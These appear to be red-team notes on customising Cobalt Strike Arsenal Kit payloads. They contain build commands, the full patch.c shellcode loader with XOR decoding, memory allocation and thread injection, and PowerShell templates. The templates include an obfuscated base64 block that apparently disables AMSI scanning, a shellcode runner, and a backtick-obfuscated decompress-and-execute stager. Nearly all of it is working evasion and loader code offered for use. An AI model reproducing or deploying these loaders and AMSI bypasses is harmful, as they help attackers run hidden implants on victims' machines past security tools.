payload_files

Modifying Payloads Compile the Artifact kit (From WSL in Attacker windows Machine)

1. patch patch.c

cd /mnt/c/Tools/cobaltstrike/arsenal-kit/kits/artifact
./build.sh mailslot VirtualAlloc 351363 0 false false none /mnt/c/Tools/cobaltstrike/custom-artifacts

cd /mnt/c/Tools/cobaltstrike/arsenal-kit/kits/resource
./build.sh /mnt/c/Tools/cobaltstrike/custom-resources

2. after all commands patch template and compress

patch.c

C:\Tools\cobaltstrike\arsenal-kit\kits\artifact\src-common\patch.c

/*
 * Artifact Kit - A means to disguise and inject our payloads... *pHEAR*
 * (c) 2012-2024 Fortra, LLC and its group of companies. All trademarks and registered trademarks are the property of their respective owners.
 *
 */

#include <windows.h>
#include <stdio.h>
#include "patch.h"
#if USE_SYSCALLS == 1
#include "syscalls.h"
#include "utils.h"
#endif

char data[sizeof(phear)] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

void set_key_pointers(void * buffer) {
   phear * payload = (phear *)data;

   /* this payload does not adhere to our protocol to pass GetModuleHandleA / GetProcAddress to
      the payload directly. */
   if (payload->gmh_offset <= 0 || payload->gpa_offset <= 0)
      return;

   void * gpa_addr = (void *)GetProcAddress;
   void * gmh_addr = (void *)GetModuleHandleA;

   memcpy(buffer + payload->gmh_offset, &gmh_addr, sizeof(void *));
   memcpy(buffer + payload->gpa_offset, &gpa_addr, sizeof(void *));
}

#ifdef _MIGRATE_
#include "start_thread.c"
#include "injector.c"
void spawn(void * buffer, int length, char * key) {
   char process[64] = "MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM";
   int x;

   /* decode the process name with the key (valid name, \0, junk to fill 64) */
   for (int x = 0; x < sizeof(process); x++) {
      *((char *)process + x) = *((char *)process + x) ^ key[x % 8]; // 8 byte XoR;
   }

   x = length;
   while(x--) {
   *((char *)buffer + x) = *((char *)buffer + x) ^ key[x % 8];
   }

   /* propagate our key function pointers to our payload */
   set_key_pointers(buffer);

   inject(buffer, length, process);
}
#else

#if STACK_SPOOF == 1
#include "spoof.c"
#endif

void run(void * buffer) {
   void (*function)();
   function = (void (*)())buffer;
#if STACK_SPOOF == 1
   beacon_threadid = GetCurrentThreadId();
#endif
   function();
}

void spawn(void * buffer, int length, char * key) {
   void * ptr = NULL;

   /* This memory allocation will be released by beacon for these conditions:.
    *    1. The stage.cleanup is set to true
    *    2. The reflective loader passes the address of the loader into DllMain.
    *
    * This is true for the built-in Cobalt Strike reflective loader and the example
    * user defined reflective loader (UDRL) in the Arsenal Kit.
    */
#if USE_HeapAlloc
   /* Create Heap */
   HANDLE heap;
   heap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);

   /* allocate the memory for our decoded payload */
   ptr = HeapAlloc(heap, 0, 10);

   /* Get wacky and add a bit of of HeapReAlloc */
   if (length > 0) {
      ptr = HeapReAlloc(heap, 0, ptr, length);
   }

#elif USE_VirtualAlloc
#if USE_SYSCALLS == 1
   SIZE_T size = length;
   NtAllocateVirtualMemory(GetCurrentProcess(), &ptr, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
#else
   ptr = VirtualAlloc(0, length, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
#endif

#elif USE_MapViewOfFile
#if USE_SYSCALLS == 1
   SIZE_T size = length;
   HANDLE hFile = create_file_mapping(0, length);
   ptr = map_view_of_file(hFile);
   NtClose(hFile);
#else
   HANDLE hFile = CreateFileMappingA(INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE, 0, length, NULL);
   ptr = MapViewOfFile(hFile, FILE_MAP_ALL_ACCESS | FILE_MAP_EXECUTE, 0, 0, 0);
   CloseHandle(hFile);
#endif
#endif


   int x = length;
   while(x--) {
   *((char *)ptr + x) = *((char *)buffer + x) ^ key[x % 8];
   }

#if STACK_SPOOF == 1
   /* setup stack spoofing */
   set_stack_spoof_code();
#endif

   /* propagate our key function pointers to our payload */
   set_key_pointers(ptr);

#if defined(USE_VirtualAlloc) || defined(USE_MapViewOfFile)
   /* fix memory protection */
   DWORD old;
#if USE_SYSCALLS == 1
   NtProtectVirtualMemory(GetCurrentProcess(), &ptr, &size, PAGE_EXECUTE_READ, &old);
#else
   VirtualProtect(ptr, length, PAGE_EXECUTE_READ, &old);
#endif
#endif

   /* spawn a thread with our data */
#if USE_SYSCALLS == 1
   HANDLE thandle;
   NtCreateThreadEx(&thandle, THREAD_ALL_ACCESS, NULL, GetCurrentProcess(), &run, ptr, 0, 0, 0, 0, NULL);
#else
   CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&run, ptr, 0, NULL);
#endif
}
#endif

template.x64.ps1

C:\Tools\cobaltstrike\custom-resources\template.x64.ps1

Set-StrictMode -Version 2

[SYstEM.Text.EnCodinG]::uniCOdE.gEtstrINg([sysTeM.coNvert]::FrombAse64StrINg("IwBVAG4AawBuAG8AdwBuACAALQAgAEYAbwByAGMAZQAgAGUAcgByAG8AcgAgAAoAJABCAFAAYwBTAHgAdQB5AFgAbQBYAGcARQBaAFIARgA9ACQAbgB1AGwAbAA7ACQAdABLADEAZABOAHMAdAByAEkAUAA9AFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEEAbABsAG8AYwBIAEcAbABvAGIAYQBsACgAKAA5ADAANwA2ACkAKQA7ACQAdABqAGEAegB2AGkAagB5AGwAYwB2AHcAaABmAHkAcQBxAG0AawBrAGYAbgB6AGgAZQB6AD0AIgArAFsAQwBoAEEAcgBdACgAWwBCAFkAdABlAF0AMAB4ADYANwApACsAWwBjAEgAYQByAF0AKABbAEIAeQB0AEUAXQAwAHgANwAwACkAKwBbAEMASABhAHIAXQAoAFsAQgBZAFQARQBdADAAeAA3ADYAKQArAFsAQwBIAEEAUgBdACgAMQAwADcAKQArAFsAQwBIAGEAcgBdACgAWwBiAFkAdABlAF0AMAB4ADcANgApACsAWwBDAGgAYQBSAF0AKABbAEIAWQB0AGUAXQAwAHgANwAzACkAKwBbAGMAaABBAFIAXQAoAFsAYgB5AHQARQBdADAAeAA2ADQAKQArAFsAQwBoAGEAcgBdACgAMQAwADYAKQArAFsAQwBIAGEAcgBdACgAWwBCAHkAVABFAF0AMAB4ADcANAApACsAWwBDAEgAYQBSAF0AKAA0ADQAKwA3ADMAKQArAFsAQwBoAGEAUgBdACgAWwBCAHkAVABFAF0AMAB4ADYAYQApACsAWwBjAEgAQQByAF0AKAA5ADkAKwAyADYALQAyADYAKQArAFsAYwBoAEEAcgBdACgANQA0ACsANgAwACkAKwBbAEMASABhAHIAXQAoADEAMQA4ACsAMgAwAC0AMgAwACkAKwBbAGMASABhAFIAXQAoADMAMwArADcANAApACsAWwBDAGgAYQByAF0AKAAxADAAOAApACsAWwBDAEgAQQByAF0AKAAxADEANgAqADcALwA3ACkAKwBbAGMASABhAFIAXQAoADEAMgAyACoAOAA0AC8AOAA0ACkAKwBbAGMASABhAFIAXQAoAFsAQgB5AHQAZQBdADAAeAA2ADMAKQArAFsAQwBIAGEAcgBdACgAMQAxADQAKwA1ADYALQA1ADYAKQArAFsAQwBoAEEAcgBdACgAMQAxADMAKQArAFsAYwBoAGEAUgBdACgAMQA1ACsAMQAwADMAKQArAFsAYwBoAEEAUgBdACgAOQA5ACkAKwBbAEMAaABBAHIAXQAoADgAKwA5ADcAKQArAFsAQwBoAGEAcgBdACgAWwBiAFkAVABFAF0AMAB4ADYAOAApACsAWwBjAEgAQQByAF0AKABbAEIAWQBUAEUAXQAwAHgANwAxACkAKwBbAGMASABBAHIAXQAoADIAMQArADgANwApACsAWwBjAGgAYQByAF0AKABbAEIAeQBUAGUAXQAwAHgANwAzACkAKwBbAEMAaABhAHIAXQAoAFsAYgB5AHQAZQBdADAAeAA3ADUAKQAiADsAWwBUAGgAcgBlAGEAZABpAG4AZwAuAFQAaAByAGUAYQBkAF0AOgA6AFMAbABlAGUAcAAoADEAMQAzADAAKQA7AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4AJAAoAFsAYwBIAGEAUgBdACgAWwBiAFkAdABlAF0AMAB4ADQAZAApACsAWwBDAGgAQQBSAF0AKABbAEIAWQBUAGUAXQAwAHgANgAxACkAKwBbAEMAaABhAHIAXQAoADMAKwAxADAANwApACsAWwBDAEgAYQByAF0AKABbAEIAWQB0AEUAXQAwAHgANgAxACkAKwBbAGMAaABhAFIAXQAoADYANwArADMANgApACsAWwBjAGgAQQBSAF0AKAAxADAAMQApACsAWwBDAGgAQQBSAF0AKAA2ADkAKwA0ADAAKQArAFsAYwBoAGEAUgBdACgAMQAwADEAKQArAFsAYwBoAEEAcgBdACgAWwBiAFkAdABFAF0AMAB4ADYAZQApACsAWwBjAEgAYQByAF0AKAAxADAAMgArADEANAApACkALgAkACgAWwBDAEgAYQByAF0AKABbAGIAWQBUAGUAXQAwAHgANAAxACkAKwBbAGMAaABhAHIAXQAoADEAMQA3ACoAMwA4AC8AMwA4ACkAKwBbAEMASABhAHIAXQAoADEAMQA2ACoANAA5AC8ANAA5ACkAKwBbAGMASABBAFIAXQAoAFsAQgBZAHQAZQBdADAAeAA2AGYAKQArAFsAYwBIAEEAUgBdACgAWwBCAHkAVABlAF0AMAB4ADYAZAApACsAWwBDAGgAYQByAF0AKAA5ADcAKQArAFsAYwBIAEEAUgBdACgAMQA3ACsAOQA5ACkAKwBbAGMASABBAFIAXQAoAFsAYgB5AFQAZQBdADAAeAA2ADkAKQArAFsAQwBoAEEAcgBdACgAWwBCAFkAVABlAF0AMAB4ADYAZgApACsAWwBjAEgAQQByAF0AKAAxADEAMAApACkALgAkACgAWwBjAGgAQQByAF0AKABbAGIAWQBUAGUAXQAwAHgANAAxACkAKwBbAEMASABBAHIAXQAoADEAMAA5ACsAOAA5AC0AOAA5ACkAKwBbAGMAaABhAFIAXQAoADIANQArADkAMAApACsAWwBjAEgAYQByAF0AKABbAEIAeQBUAGUAXQAwAHgANgA5ACkAKwBbAEMAaABBAHIAXQAoAFsAYgBZAHQAZQBdADAAeAA1ADUAKQArAFsAYwBoAEEAcgBdACgAWwBiAFkAdABlAF0AMAB4ADcANAApACsAWwBjAGgAYQByAF0AKABbAEIAeQBUAEUAXQAwAHgANgA5ACkAKwBbAGMAaABBAHIAXQAoAFsAQgB5AFQAZQBdADAAeAA2AGMAKQArAFsAYwBoAGEAcgBdACgAMQAxADUAKgAxADEAMgAvADEAMQAyACkAKQAiACkALgBHAGUAdABGAGkAZQBsAGQAKAAiACQAKABbAGMAaABBAHIAXQAoAFsAQgBZAFQARQBdADAAeAA2ADEAKQArAFsAYwBIAGEAUgBdACgAMQAwADkAKgA5ADgALwA5ADgAKQArAFsAYwBIAGEAcgBdACgAWwBCAFkAVABlAF0AMAB4ADcAMwApACsAWwBDAEgAQQByAF0AKAAxADAANQArADgAOQAtADgAOQApACsAWwBjAGgAYQBSAF0AKAA4ADMAKgA4ADAALwA4ADAAKQArAFsAQwBoAGEAUgBdACgAWwBCAHkAdABFAF0AMAB4ADYANQApACsAWwBDAEgAQQBSAF0AKABbAEIAeQB0AGUAXQAwAHgANwAzACkAKwBbAEMASABBAHIAXQAoADEAMQA1ACoAMQAwADkALwAxADAAOQApACsAWwBjAEgAQQByAF0AKAAzADAAKwA3ADUAKQArAFsAYwBIAGEAcgBdACgAMQAxADEAKgAyADEALwAyADEAKQArAFsAYwBoAEEAcgBdACgAMQA4ACsAOQAyACkAKQAiACwAIAAiAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAIgApAC4AUwBlAHQAVgBhAGwAdQBlACgAJABCAFAAYwBTAHgAdQB5AFgAbQBYAGcARQBaAFIARgAsACAAJABCAFAAYwBTAHgAdQB5AFgAbQBYAGcARQBaAFIARgApADsAWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACIAUwB5AHMAdABlAG0ALgAkACgAWwBjAEgAYQBSAF0AKABbAGIAWQB0AGUAXQAwAHgANABkACkAKwBbAEMAaABBAFIAXQAoAFsAQgBZAFQAZQBdADAAeAA2ADEAKQArAFsAQwBoAGEAcgBdACgAMwArADEAMAA3ACkAKwBbAEMASABhAHIAXQAoAFsAQgBZAHQARQBdADAAeAA2ADEAKQArAFsAYwBoAGEAUgBdACgANgA3ACsAMwA2ACkAKwBbAGMAaABBAFIAXQAoADEAMAAxACkAKwBbAEMAaABBAFIAXQAoADYAOQArADQAMAApACsAWwBjAGgAYQBSAF0AKAAxADAAMQApACsAWwBjAGgAQQByAF0AKABbAGIAWQB0AEUAXQAwAHgANgBlACkAKwBbAGMASABhAHIAXQAoADEAMAAyACsAMQA0ACkAKQAuACQAKABbAEMASABhAHIAXQAoAFsAYgBZAFQAZQBdADAAeAA0ADEAKQArAFsAYwBoAGEAcgBdACgAMQAxADcAKgAzADgALwAzADgAKQArAFsAQwBIAGEAcgBdACgAMQAxADYAKgA0ADkALwA0ADkAKQArAFsAYwBIAEEAUgBdACgAWwBCAFkAdABlAF0AMAB4ADYAZgApACsAWwBjAEgAQQBSAF0AKABbAEIAeQBUAGUAXQAwAHgANgBkACkAKwBbAEMAaABhAHIAXQAoADkANwApACsAWwBjAEgAQQBSAF0AKAAxADcAKwA5ADkAKQArAFsAYwBIAEEAUgBdACgAWwBiAHkAVABlAF0AMAB4ADYAOQApACsAWwBDAGgAQQByAF0AKABbAEIAWQBUAGUAXQAwAHgANgBmACkAKwBbAGMASABBAHIAXQAoADEAMQAwACkAKQAuACQAKABbAGMAaABBAHIAXQAoAFsAYgBZAFQAZQBdADAAeAA0ADEAKQArAFsAQwBIAEEAcgBdACgAMQAwADkAKwA4ADkALQA4ADkAKQArAFsAYwBoAGEAUgBdACgAMgA1ACsAOQAwACkAKwBbAGMASABhAHIAXQAoAFsAQgB5AFQAZQBdADAAeAA2ADkAKQArAFsAQwBoAEEAcgBdACgAWwBiAFkAdABlAF0AMAB4ADUANQApACsAWwBjAGgAQQByAF0AKABbAGIAWQB0AGUAXQAwAHgANwA0ACkAKwBbAGMAaABhAHIAXQAoAFsAQgB5AFQARQBdADAAeAA2ADkAKQArAFsAYwBoAEEAcgBdACgAWwBCAHkAVABlAF0AMAB4ADYAYwApACsAWwBjAGgAYQByAF0AKAAxADEANQAqADEAMQAyAC8AMQAxADIAKQApACIAKQAuAEcAZQB0AEYAaQBlAGwAZAAoACIAJAAoAFsAQwBoAEEAcgBdACgAOQA3ACsANAAtADQAKQArAFsAYwBoAEEAcgBdACgAMQAwADkAKQArAFsAQwBIAEEAUgBdACgAWwBCAFkAdABFAF0AMAB4ADcAMwApACsAWwBDAEgAYQByAF0AKABbAEIAeQBUAEUAXQAwAHgANgA5ACkAKwBbAEMAaABBAFIAXQAoAFsAQgBZAFQARQBdADAAeAA0ADMAKQArAFsAQwBIAGEAcgBdACgAWwBCAFkAdABFAF0AMAB4ADYAZgApACsAWwBjAEgAQQByAF0AKAA0ADMAKwA2ADcAKQArAFsAQwBIAEEAUgBdACgAMQAxADYAKQArAFsAYwBoAGEAcgBdACgAMQAwADEAKwA5ADEALQA5ADEAKQArAFsAYwBIAEEAcgBdACgAWwBiAFkAVABlAF0AMAB4ADcAOAApACsAWwBDAEgAQQBSAF0AKAAxADEANgApACkAIgAsACAAIgBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACIAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAQgBQAGMAUwB4AHUAeQBYAG0AWABnAEUAWgBSAEYALAAgAFsASQBuAHQAUAB0AHIAXQAkAHQASwAxAGQATgBzAHQAcgBJAFAAKQA7ACQAZQB1AHUAZABtAHQAcQB0AHcAdABpAGUAdQBrAGMAPQAiACsAWwBDAGgAQQBSAF0AKABbAGIAeQB0AGUAXQAwAHgANgAzACkAKwBbAGMASABBAHIAXQAoADYANQArADQANQApACsAWwBjAEgAQQByAF0AKAAxADEAOQAqADgAMwAvADgAMwApACsAWwBjAEgAQQBSAF0AKAAxADEAMAAqADQANgAvADQANgApACsAWwBjAGgAQQByAF0AKAAxADEANwApACsAWwBDAEgAQQBSAF0AKABbAEIAeQBUAEUAXQAwAHgANgAyACkAKwBbAGMASABhAFIAXQAoAFsAYgB5AFQARQBdADAAeAA2AGEAKQArAFsAYwBIAGEAUgBdACgAMQAwADMAKgA3AC8ANwApACsAWwBDAGgAYQBSAF0AKAA5ADkAKQArAFsAYwBIAEEAUgBdACgAWwBCAFkAVABFAF0AMAB4ADYAZAApACsAWwBjAEgAQQByAF0AKAAxADEAMgArADYALQA2ACkAKwBbAGMAaABhAHIAXQAoAFsAYgBZAFQARQBdADAAeAA3ADAAKQAiADsAWwBUAGgAcgBlAGEAZABpAG4AZwAuAFQAaAByAGUAYQBkAF0AOgA6AFMAbABlAGUAcAAoADEANAAyADcAKQA="))|iex

function get_proc_address {
	Param ($var_module, $var_procedure)		
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function get_delegate_type {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
		[Parameter(Position = 1)] [Type] $var_return_type = [Void]
	)

	$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
	$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

	return $var_type_builder.CreateType()
}

If ([IntPtr]::size -eq 8) {
	[Byte[]]$v_code = [System.Convert]::FromBase64String('%%DATA%%')

	for ($zz = 0; $zz -lt $v_code.Count; $zz++) {
		$v_code[$zz] = $v_code[$zz] -bxor 35
	}

	$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((get_proc_address kernel32.dll VirtualAlloc), (get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
	$var_buffer = $var_va.Invoke([IntPtr]::Zero, $v_code.Length, 0x3000, 0x40)
	$var_wpm = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((get_proc_address kernel32.dll WriteProcessMemory), (get_delegate_type @([IntPtr], [IntPtr], [Byte[]], [UInt32], [IntPtr]) ([Bool])))
	$ok = $var_wpm.Invoke([IntPtr]::New(-1), $var_buffer, $v_code, $v_code.Count, [IntPtr]::Zero)

	$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (get_delegate_type @([IntPtr]) ([Void])))
	$var_runme.Invoke([IntPtr]::Zero)
}

template.x64.ps1

C:\Tools\cobaltstrike\custom-resources\compress.ps1

SET-itEm  VarIABLe:WyizE ([tyPe]('conVE'+'Rt') ) ;  seT-variAbLe  0eXs  (  [tYpe]('iO.'+'COmp'+'Re'+'S'+'SiON.C'+'oM'+'P'+'ResSIonM'+'oDE')) ; ${s}=nEW-o`Bj`eCt IO.`MemO`Ry`St`REAM(, (VAriABle wYIze -val  )::"FR`omB`AsE64s`TriNG"("%%DATA%%"));i`EX (ne`w-`o`BJECT i`o.sTr`EAmRe`ADEr(NEw-`O`BJe`CT IO.CO`mPrESSi`oN.`gzI`pS`Tream(${s}, ( vAriable  0ExS).vALUE::"Dec`om`Press")))."RE`AdT`OEnd"();